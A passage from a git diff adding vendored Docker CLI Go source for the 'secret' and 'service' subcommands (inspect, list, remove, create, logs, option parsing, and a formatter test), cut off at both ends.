err != nil { + return err + } + + fmt.Fprintln(dockerCli.Out(), r.ID) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/inspect.go b/vendor/github.com/docker/docker/cli/command/secret/inspect.go new file mode 100644 index 0000000000..0a8bd4a23f --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/inspect.go @@ -0,0 +1,45 @@ +package secret + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type inspectOptions struct { + names []string + format string +} + +func newSecretInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := inspectOptions{} + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] SECRET [SECRET...]", + Short: "Display detailed information on one or more secrets", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.names = args + return runSecretInspect(dockerCli, opts) + }, + } + + cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + return cmd +} + +func runSecretInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + ids, err := getCliRequestedSecretIDs(ctx, client, opts.names) + if err != nil { + return err + } + getRef := func(id string) (interface{}, []byte, error) { + return client.SecretInspectWithRaw(ctx, id) + } + + return inspect.Inspect(dockerCli.Out(), ids, opts.format, getRef) +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/ls.go b/vendor/github.com/docker/docker/cli/command/secret/ls.go new file mode 100644 index 0000000000..faeab314b7 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/ls.go @@ -0,0 +1,68 @@ +package secret + +import ( + "fmt" + "text/tabwriter" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/go-units" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type listOptions struct { + quiet bool +} + +func newSecretListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List secrets", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runSecretList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") + + return cmd +} + +func runSecretList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + secrets, err := client.SecretList(ctx, types.SecretListOptions{}) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + if opts.quiet { + for _, s := range secrets { + fmt.Fprintf(w, "%s\n", s.ID) + } + } else { + fmt.Fprintf(w, "ID\tNAME\tCREATED\tUPDATED") + fmt.Fprintf(w, "\n") + + for _, s := range secrets { + created := units.HumanDuration(time.Now().UTC().Sub(s.Meta.CreatedAt)) + " ago" + updated := units.HumanDuration(time.Now().UTC().Sub(s.Meta.UpdatedAt)) + " ago" + + fmt.Fprintf(w, "%s\t%s\t%s\t%s\n", s.ID, s.Spec.Annotations.Name, created, updated) + } + } + + w.Flush() + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/remove.go b/vendor/github.com/docker/docker/cli/command/secret/remove.go new file mode 100644 index 0000000000..f45a619f6a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/remove.go @@ -0,0 +1,57 @@ +package secret + +import ( + "fmt" + "strings" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type removeOptions struct { + names []string +} + +func newSecretRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "rm SECRET [SECRET...]", + Aliases: []string{"remove"}, + Short: "Remove one or more secrets", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts := removeOptions{ + names: args, + } + return runSecretRemove(dockerCli, opts) + }, + } +} + +func runSecretRemove(dockerCli *command.DockerCli, opts removeOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + ids, err := getCliRequestedSecretIDs(ctx, client, opts.names) + if err != nil { + return err + } + + var errs []string + + for _, id := range ids { + if err := client.SecretRemove(ctx, id); err != nil { + errs = append(errs, err.Error()) + continue + } + + fmt.Fprintln(dockerCli.Out(), id) + } + + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/utils.go b/vendor/github.com/docker/docker/cli/command/secret/utils.go new file mode 100644 index 0000000000..11d31ffd16 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/utils.go @@ -0,0 +1,76 @@ +package secret + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "golang.org/x/net/context" +) + +// GetSecretsByNameOrIDPrefixes returns secrets given a list of ids or names +func GetSecretsByNameOrIDPrefixes(ctx context.Context, client client.APIClient, terms []string) ([]swarm.Secret, error) { + args := filters.NewArgs() + for _, n := range terms { + args.Add("names", n) + args.Add("id", n) + } + + return client.SecretList(ctx, types.SecretListOptions{ + Filters: args, + }) +} + +func getCliRequestedSecretIDs(ctx context.Context, client client.APIClient, terms []string) ([]string, error) { + secrets, err := GetSecretsByNameOrIDPrefixes(ctx, client, terms) + if err != nil { + return nil, err + } + + if len(secrets) > 0 { + found := make(map[string]struct{}) + next: + for _, term := range terms { + // attempt to lookup secret by full ID + for _, s := range secrets { + if s.ID == term { + found[s.ID] = struct{}{} + continue next + } + } + // attempt to lookup secret by full name + for _, s := range secrets { + if s.Spec.Annotations.Name == term { + found[s.ID] = struct{}{} + continue next + } + } + // attempt to lookup secret by partial ID (prefix) + // return error if more than one matches found (ambiguous) + n := 0 + for _, s := range secrets { + if strings.HasPrefix(s.ID, term) { + found[s.ID] = struct{}{} + n++ + } + } + if n > 1 { + return nil, fmt.Errorf("secret %s is ambiguous (%d matches found)", term, n) + } + } + + // We already collected all the IDs found. + // Now we will remove duplicates by converting the map to slice + ids := []string{} + for id := range found { + ids = append(ids, id) + } + + return ids, nil + } + + return terms, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/cmd.go b/vendor/github.com/docker/docker/cli/command/service/cmd.go new file mode 100644 index 0000000000..796fe926c3 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/cmd.go @@ -0,0 +1,29 @@ +package service + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewServiceCommand returns a cobra command for `service` subcommands +func NewServiceCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "service", + Short: "Manage services", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newCreateCommand(dockerCli), + newInspectCommand(dockerCli), + newPsCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + newScaleCommand(dockerCli), + newUpdateCommand(dockerCli), + newLogsCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/service/create.go b/vendor/github.com/docker/docker/cli/command/service/create.go new file mode 100644 index 0000000000..1355c19c65 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/create.go @@ -0,0 +1,100 @@ +package service + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := newServiceOptions() + + cmd := &cobra.Command{ + Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", + Short: "Create a new service", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.image = args[0] + if len(args) > 1 { + opts.args = args[1:] + } + return runCreate(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.StringVar(&opts.mode, flagMode, "replicated", "Service mode (replicated or global)") + flags.StringVar(&opts.name, flagName, "", "Service name") + + addServiceFlags(cmd, opts) + + flags.VarP(&opts.labels, flagLabel, "l", "Service labels") + flags.Var(&opts.containerLabels, flagContainerLabel, "Container labels") + flags.VarP(&opts.env, flagEnv, "e", "Set environment variables") + flags.Var(&opts.envFile, flagEnvFile, "Read in a file of environment variables") + flags.Var(&opts.mounts, flagMount, "Attach a filesystem mount to the service") + flags.Var(&opts.constraints, flagConstraint, "Placement constraints") + flags.Var(&opts.networks, flagNetwork, "Network attachments") + flags.Var(&opts.secrets, flagSecret, "Specify secrets to expose to the service") + flags.VarP(&opts.endpoint.publishPorts, flagPublish, "p", "Publish a port as a node port") + flags.Var(&opts.groups, flagGroup, "Set one or more supplementary user groups for the container") + flags.Var(&opts.dns, flagDNS, "Set custom DNS servers") + flags.Var(&opts.dnsOption, flagDNSOption, "Set DNS options") + flags.Var(&opts.dnsSearch, flagDNSSearch, "Set custom DNS search domains") + flags.Var(&opts.hosts, flagHost, "Set one or more custom host-to-IP mappings (host:ip)") + + flags.SetInterspersed(false) + return cmd +} + +func runCreate(dockerCli *command.DockerCli, opts *serviceOptions) error { + apiClient := dockerCli.Client() + createOpts := types.ServiceCreateOptions{} + + service, err := opts.ToService() + if err != nil { + return err + } + + specifiedSecrets := opts.secrets.Value() + if len(specifiedSecrets) > 0 { + // parse and validate secrets + secrets, err := ParseSecrets(apiClient, specifiedSecrets) + if err != nil { + return err + } + service.TaskTemplate.ContainerSpec.Secrets = secrets + + } + + ctx := context.Background() + + if err := resolveServiceImageDigest(dockerCli, &service); err != nil { + return err + } + + // only send auth if flag was set + if opts.registryAuth { + // Retrieve encoded auth token from the image reference + encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, opts.image) + if err != nil { + return err + } + createOpts.EncodedRegistryAuth = encodedAuth + } + + response, err := apiClient.ServiceCreate(ctx, service, createOpts) + if err != nil { + return err + } + + for _, warning := range response.Warnings { + fmt.Fprintln(dockerCli.Err(), warning) + } + + fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect.go b/vendor/github.com/docker/docker/cli/command/service/inspect.go new file mode 100644 index 0000000000..deb701bf6d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/inspect.go @@ -0,0 +1,84 @@ +package service + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + apiclient "github.com/docker/docker/client" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + refs []string + format string + pretty bool +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] SERVICE [SERVICE...]", + Short: "Display detailed information on one or more services", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.refs = args + + if opts.pretty && len(opts.format) > 0 { + return fmt.Errorf("--format is incompatible with human friendly format") + } + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.") + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + if opts.pretty { + opts.format = "pretty" + } + + getRef := func(ref string) (interface{}, []byte, error) { + service, _, err := client.ServiceInspectWithRaw(ctx, ref) + if err == nil || !apiclient.IsErrServiceNotFound(err) { + return service, nil, err + } + return nil, nil, fmt.Errorf("Error: no such service: %s", ref) + } + + f := opts.format + if len(f) == 0 { + f = "raw" + if len(dockerCli.ConfigFile().ServiceInspectFormat) > 0 { + f = dockerCli.ConfigFile().ServiceInspectFormat + } + } + + // check if the user is trying to apply a template to the pretty format, which + // is not supported + if strings.HasPrefix(f, "pretty") && f != "pretty" { + return fmt.Errorf("Cannot supply extra formatting options to the pretty template") + } + + serviceCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewServiceFormat(f), + } + + if err := formatter.ServiceInspectWrite(serviceCtx, opts.refs, getRef); err != nil { + return cli.StatusError{StatusCode: 1, Status: err.Error()} + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go new file mode 100644 index 0000000000..04a65080c7 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go @@ -0,0 +1,129 @@ +package service + +import ( + "bytes" + "encoding/json" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/pkg/testutil/assert" +) + +func formatServiceInspect(t *testing.T, format formatter.Format, now time.Time) string { + b := new(bytes.Buffer) + + endpointSpec := &swarm.EndpointSpec{ + Mode: "vip", + Ports: []swarm.PortConfig{ + { + Protocol: swarm.PortConfigProtocolTCP, + TargetPort: 5000, + }, + }, + } + + two := uint64(2) + + s := swarm.Service{ + ID: "de179gar9d0o7ltdybungplod", + Meta: swarm.Meta{ + Version: swarm.Version{Index: 315}, + CreatedAt: now, + UpdatedAt: now, + }, + Spec: swarm.ServiceSpec{ + Annotations: swarm.Annotations{ + Name: "my_service", + Labels: map[string]string{"com.label": "foo"}, + }, + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: "foo/bar@sha256:this_is_a_test", + }, + }, + Mode: swarm.ServiceMode{ + Replicated: &swarm.ReplicatedService{ + Replicas: &two, + }, + }, + UpdateConfig: nil, + Networks: []swarm.NetworkAttachmentConfig{ + { + Target: "5vpyomhb6ievnk0i0o60gcnei", + Aliases: []string{"web"}, + }, + }, + EndpointSpec: endpointSpec, + }, + Endpoint: swarm.Endpoint{ + Spec: *endpointSpec, + Ports: []swarm.PortConfig{ + { + Protocol: swarm.PortConfigProtocolTCP, + TargetPort: 5000, + PublishedPort: 30000, + }, + }, + VirtualIPs: []swarm.EndpointVirtualIP{ + { + NetworkID: "6o4107cj2jx9tihgb0jyts6pj", + Addr: "10.255.0.4/16", + }, + }, + }, + UpdateStatus: swarm.UpdateStatus{ + StartedAt: now, + CompletedAt: now, + }, + } + + ctx := formatter.Context{ + Output: b, + Format: format, + } + + err := formatter.ServiceInspectWrite(ctx, []string{"de179gar9d0o7ltdybungplod"}, func(ref string) (interface{}, []byte, error) { + return s, nil, nil + }) + if err != nil { + t.Fatal(err) + } + return b.String() +} + +func TestPrettyPrintWithNoUpdateConfig(t *testing.T) { + s := formatServiceInspect(t, formatter.NewServiceFormat("pretty"), time.Now()) + if strings.Contains(s, "UpdateStatus") { + t.Fatal("Pretty print failed before parsing UpdateStatus") + } +} + +func TestJSONFormatWithNoUpdateConfig(t *testing.T) { + now := time.Now() + // s1: [{"ID":..}] + // s2: {"ID":..} + s1 := formatServiceInspect(t, formatter.NewServiceFormat(""), now) + t.Log("// s1") + t.Logf("%s", s1) + s2 := formatServiceInspect(t, formatter.NewServiceFormat("{{json .}}"), now) + t.Log("// s2") + t.Logf("%s", s2) + var m1Wrap []map[string]interface{} + if err := json.Unmarshal([]byte(s1), &m1Wrap); err != nil { + t.Fatal(err) + } + if len(m1Wrap) != 1 { + t.Fatalf("strange s1=%s", s1) + } + m1 := m1Wrap[0] + t.Logf("m1=%+v", m1) + var m2 map[string]interface{} + if err := json.Unmarshal([]byte(s2), &m2); err != nil { + t.Fatal(err) + } + t.Logf("m2=%+v", m2) + assert.DeepEqual(t, m2, m1) +} diff --git a/vendor/github.com/docker/docker/cli/command/service/list.go b/vendor/github.com/docker/docker/cli/command/service/list.go new file mode 100644 index 0000000000..724126079c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/list.go @@ -0,0 +1,158 @@ +package service + +import ( + "fmt" + "io" + "text/tabwriter" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/stringid" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +const ( + listItemFmt = "%s\t%s\t%s\t%s\t%s\n" +) + +type listOptions struct { + quiet bool + filter opts.FilterOpt +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List services", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + ctx := context.Background() + client := dockerCli.Client() + out := dockerCli.Out() + + services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: opts.filter.Value()}) + if err != nil { + return err + } + + if len(services) > 0 && !opts.quiet { + // only non-empty services and not quiet, should we call TaskList and NodeList api + taskFilter := filters.NewArgs() + for _, service := range services { + taskFilter.Add("service", service.ID) + } + + tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter}) + if err != nil { + return err + } + + nodes, err := client.NodeList(ctx, types.NodeListOptions{}) + if err != nil { + return err + } + + PrintNotQuiet(out, services, nodes, tasks) + } else if !opts.quiet { + // no services and not quiet, print only one line with columns ID, NAME, MODE, REPLICAS... + PrintNotQuiet(out, services, []swarm.Node{}, []swarm.Task{}) + } else { + PrintQuiet(out, services) + } + + return nil +} + +// PrintNotQuiet shows service list in a non-quiet way. +// Besides this, command `docker stack services xxx` will call this, too. +func PrintNotQuiet(out io.Writer, services []swarm.Service, nodes []swarm.Node, tasks []swarm.Task) { + activeNodes := make(map[string]struct{}) + for _, n := range nodes { + if n.Status.State != swarm.NodeStateDown { + activeNodes[n.ID] = struct{}{} + } + } + + running := map[string]int{} + tasksNoShutdown := map[string]int{} + + for _, task := range tasks { + if task.DesiredState != swarm.TaskStateShutdown { + tasksNoShutdown[task.ServiceID]++ + } + + if _, nodeActive := activeNodes[task.NodeID]; nodeActive && task.Status.State == swarm.TaskStateRunning { + running[task.ServiceID]++ + } + } + + printTable(out, services, running, tasksNoShutdown) +} + +func printTable(out io.Writer, services []swarm.Service, running, tasksNoShutdown map[string]int) { + writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) + + // Ignore flushing errors + defer writer.Flush() + + fmt.Fprintf(writer, listItemFmt, "ID", "NAME", "MODE", "REPLICAS", "IMAGE") + + for _, service := range services { + mode := "" + replicas := "" + if service.Spec.Mode.Replicated != nil && service.Spec.Mode.Replicated.Replicas != nil { + mode = "replicated" + replicas = fmt.Sprintf("%d/%d", running[service.ID], *service.Spec.Mode.Replicated.Replicas) + } else if service.Spec.Mode.Global != nil { + mode = "global" + replicas = fmt.Sprintf("%d/%d", running[service.ID], tasksNoShutdown[service.ID]) + } + image := service.Spec.TaskTemplate.ContainerSpec.Image + ref, err := distreference.ParseNamed(image) + if err == nil { + // update image string for display + namedTagged, ok := ref.(distreference.NamedTagged) + if ok { + image = namedTagged.Name() + ":" + namedTagged.Tag() + } + } + + fmt.Fprintf( + writer, + listItemFmt, + stringid.TruncateID(service.ID), + service.Spec.Name, + mode, + replicas, + image) + } +} + +// PrintQuiet shows service list in a quiet way. +// Besides this, command `docker stack services xxx` will call this, too. +func PrintQuiet(out io.Writer, services []swarm.Service) { + for _, service := range services { + fmt.Fprintln(out, service.ID) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/service/logs.go b/vendor/github.com/docker/docker/cli/command/service/logs.go new file mode 100644 index 0000000000..19d3d9a488 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/logs.go @@ -0,0 +1,163 @@ +package service + +import ( + "bytes" + "fmt" + "io" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/pkg/stdcopy" + "github.com/spf13/cobra" +) + +type logsOptions struct { + noResolve bool + follow bool + since string + timestamps bool + details bool + tail string + + service string +} + +func newLogsCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts logsOptions + + cmd := &cobra.Command{ + Use: "logs [OPTIONS] SERVICE", + Short: "Fetch the logs of a service", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.service = args[0] + return runLogs(dockerCli, &opts) + }, + Tags: map[string]string{"experimental": ""}, + } + + flags := cmd.Flags() + flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") + flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output") + flags.StringVar(&opts.since, "since", "", "Show logs since timestamp") + flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps") + flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs") + flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs") + return cmd +} + +func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error { + ctx := context.Background() + + options := types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Since: opts.since, + Timestamps: opts.timestamps, + Follow: opts.follow, + Tail: opts.tail, + Details: opts.details, + } + + client := dockerCli.Client() + responseBody, err := client.ServiceLogs(ctx, opts.service, options) + if err != nil { + return err + } + defer responseBody.Close() + + resolver := idresolver.New(client, opts.noResolve) + + stdout := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Out()} + stderr := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Err()} + + // TODO(aluzzardi): Do an io.Copy for services with TTY enabled. + _, err = stdcopy.StdCopy(stdout, stderr, responseBody) + return err +} + +type logWriter struct { + ctx context.Context + opts *logsOptions + r *idresolver.IDResolver + w io.Writer +} + +func (lw *logWriter) Write(buf []byte) (int, error) { + contextIndex := 0 + numParts := 2 + if lw.opts.timestamps { + contextIndex++ + numParts++ + } + + parts := bytes.SplitN(buf, []byte(" "), numParts) + if len(parts) != numParts { + return 0, fmt.Errorf("invalid context in log message: %v", string(buf)) + } + + taskName, nodeName, err := lw.parseContext(string(parts[contextIndex])) + if err != nil { + return 0, err + } + + output := []byte{} + for i, part := range parts { + // First part doesn't get space separation. + if i > 0 { + output = append(output, []byte(" ")...) + } + + if i == contextIndex { + // TODO(aluzzardi): Consider constant padding. + output = append(output, []byte(fmt.Sprintf("%s@%s |", taskName, nodeName))...) + } else { + output = append(output, part...) + } + } + _, err = lw.w.Write(output) + if err != nil { + return 0, err + } + + return len(buf), nil +} + +func (lw *logWriter) parseContext(input string) (string, string, error) { + context := make(map[string]string) + + components := strings.Split(input, ",") + for _, component := range components { + parts := strings.SplitN(component, "=", 2) + if len(parts) != 2 { + return "", "", fmt.Errorf("invalid context: %s", input) + } + context[parts[0]] = parts[1] + } + + taskID, ok := context["com.docker.swarm.task.id"] + if !ok { + return "", "", fmt.Errorf("missing task id in context: %s", input) + } + taskName, err := lw.r.Resolve(lw.ctx, swarm.Task{}, taskID) + if err != nil { + return "", "", err + } + + nodeID, ok := context["com.docker.swarm.node.id"] + if !ok { + return "", "", fmt.Errorf("missing node id in context: %s", input) + } + nodeName, err := lw.r.Resolve(lw.ctx, swarm.Node{}, nodeID) + if err != nil { + return "", "", err + } + + return taskName, nodeName, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/opts.go b/vendor/github.com/docker/docker/cli/command/service/opts.go new file mode 100644 index 0000000000..cbe544aacc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/opts.go @@ -0,0 +1,648 @@ +package service + +import ( + "encoding/csv" + "fmt" + "os" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type int64Value interface { + Value() int64 +} + +type memBytes int64 + +func (m *memBytes) String() string { + return units.BytesSize(float64(m.Value())) +} + +func (m *memBytes) Set(value string) error { + val, err := units.RAMInBytes(value) + *m = memBytes(val) + return err +} + +func (m *memBytes) Type() string { + return "bytes" +} + +func (m *memBytes) Value() int64 { + return int64(*m) +} + +// PositiveDurationOpt is an option type for time.Duration that uses a pointer. +// It bahave similarly to DurationOpt but only allows positive duration values. +type PositiveDurationOpt struct { + DurationOpt +} + +// Set a new value on the option. Setting a negative duration value will cause +// an error to be returned. +func (d *PositiveDurationOpt) Set(s string) error { + err := d.DurationOpt.Set(s) + if err != nil { + return err + } + if *d.DurationOpt.value < 0 { + return fmt.Errorf("duration cannot be negative") + } + return nil +} + +// DurationOpt is an option type for time.Duration that uses a pointer. This +// allows us to get nil values outside, instead of defaulting to 0 +type DurationOpt struct { + value *time.Duration +} + +// Set a new value on the option +func (d *DurationOpt) Set(s string) error { + v, err := time.ParseDuration(s) + d.value = &v + return err +} + +// Type returns the type of this option, which will be displayed in `--help` output +func (d *DurationOpt) Type() string { + return "duration" +} + +// String returns a string repr of this option +func (d *DurationOpt) String() string { + if d.value != nil { + return d.value.String() + } + return "" +} + +// Value returns the time.Duration +func (d *DurationOpt) Value() *time.Duration { + return d.value +} + +// Uint64Opt represents a uint64. +type Uint64Opt struct { + value *uint64 +} + +// Set a new value on the option +func (i *Uint64Opt) Set(s string) error { + v, err := strconv.ParseUint(s, 0, 64) + i.value = &v + return err +} + +// Type returns the type of this option, which will be displayed in `--help` output +func (i *Uint64Opt) Type() string { + return "uint" +} + +// String returns a string repr of this option +func (i *Uint64Opt) String() string { + if i.value != nil { + return fmt.Sprintf("%v", *i.value) + } + return "" +} + +// Value returns the uint64 +func (i *Uint64Opt) Value() *uint64 { + return i.value +} + +type floatValue float32 + +func (f *floatValue) Set(s string) error { + v, err := strconv.ParseFloat(s, 32) + *f = floatValue(v) + return err +} + +func (f *floatValue) Type() string { + return "float" +} + +func (f *floatValue) String() string { + return strconv.FormatFloat(float64(*f), 'g', -1, 32) +} + +func (f *floatValue) Value() float32 { + return float32(*f) +} + +// SecretRequestSpec is a type for requesting secrets +type SecretRequestSpec struct { + source string + target string + uid string + gid string + mode os.FileMode +} + +// SecretOpt is a Value type for parsing secrets +type SecretOpt struct { + values []*SecretRequestSpec +} + +// Set a new secret value +func (o *SecretOpt) Set(value string) error { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + spec := &SecretRequestSpec{ + source: "", + target: "", + uid: "0", + gid: "0", + mode: 0444, + } + + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + key := strings.ToLower(parts[0]) + + if len(parts) != 2 { + return fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + value := parts[1] + switch key { + case "source", "src": + spec.source = value + case "target": + tDir, _ := filepath.Split(value) + if tDir != "" { + return fmt.Errorf("target must not have a path") + } + spec.target = value + case "uid": + spec.uid = value + case "gid": + spec.gid = value + case "mode": + m, err := strconv.ParseUint(value, 0, 32) + if err != nil { + return fmt.Errorf("invalid mode specified: %v", err) + } + + spec.mode = os.FileMode(m) + default: + return fmt.Errorf("invalid field in secret request: %s", key) + } + } + + if spec.source == "" { + return fmt.Errorf("source is required") + } + + o.values = append(o.values, spec) + return nil +} + +// Type returns the type of this option +func (o *SecretOpt) Type() string { + return "secret" +} + +// String returns a string repr of this option +func (o *SecretOpt) String() string { + secrets := []string{} + for _, secret := range o.values { + repr := fmt.Sprintf("%s -> %s", secret.source, secret.target) + secrets = append(secrets, repr) + } + return strings.Join(secrets, ", ") +} + +// Value returns the secret requests +func (o *SecretOpt) Value() []*SecretRequestSpec { + return o.values +} + +type updateOptions struct { + parallelism uint64 + delay time.Duration + monitor time.Duration + onFailure string + maxFailureRatio floatValue +} + +type resourceOptions struct { + limitCPU opts.NanoCPUs + limitMemBytes memBytes + resCPU opts.NanoCPUs + resMemBytes memBytes +} + +func (r *resourceOptions) ToResourceRequirements() *swarm.ResourceRequirements { + return &swarm.ResourceRequirements{ + Limits: &swarm.Resources{ + NanoCPUs: r.limitCPU.Value(), + MemoryBytes: r.limitMemBytes.Value(), + }, + Reservations: &swarm.Resources{ + NanoCPUs: r.resCPU.Value(), + MemoryBytes: r.resMemBytes.Value(), + }, + } +} + +type restartPolicyOptions struct { + condition string + delay DurationOpt + maxAttempts Uint64Opt + window DurationOpt +} + +func (r *restartPolicyOptions) ToRestartPolicy() *swarm.RestartPolicy { + return &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyCondition(r.condition), + Delay: r.delay.Value(), + MaxAttempts: r.maxAttempts.Value(), + Window: r.window.Value(), + } +} + +func convertNetworks(networks []string) []swarm.NetworkAttachmentConfig { + nets := []swarm.NetworkAttachmentConfig{} + for _, network := range networks { + nets = append(nets, swarm.NetworkAttachmentConfig{Target: network}) + } + return nets +} + +type endpointOptions struct { + mode string + publishPorts opts.PortOpt +} + +func (e *endpointOptions) ToEndpointSpec() *swarm.EndpointSpec { + return &swarm.EndpointSpec{ + Mode: swarm.ResolutionMode(strings.ToLower(e.mode)), + Ports: e.publishPorts.Value(), + } +} + +type logDriverOptions struct { + name string + opts opts.ListOpts +} + +func newLogDriverOptions() logDriverOptions { + return 